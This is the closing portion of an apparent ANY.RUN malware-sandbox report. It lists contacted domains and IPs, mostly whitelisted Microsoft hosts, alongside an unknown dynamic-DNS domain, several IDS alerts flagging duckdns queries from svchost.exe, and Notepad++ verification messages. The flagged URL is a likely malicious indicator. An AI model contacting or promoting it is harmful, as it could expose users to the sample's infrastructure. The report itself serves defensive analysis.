  • 23.15.178.147
  • 23.15.178.226
  • 2.23.227.215
  • 2.23.227.208
whitelisted
ocsp.digicert.com
  • 184.30.131.245
  • 2.17.190.73
whitelisted
login.live.com
  • 40.126.31.131
  • 40.126.31.128
  • 20.190.159.64
  • 40.126.31.69
  • 40.126.31.71
  • 20.190.159.2
  • 40.126.31.130
  • 40.126.31.129
whitelisted
asegurar4octubre.duckdns.org
  • 46.246.80.11
unknown
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 204.79.197.239
  • 13.107.21.239
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
VerifyLibrary: error while getting certificate informations
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
http://asegurar4octubre.duckdns.org/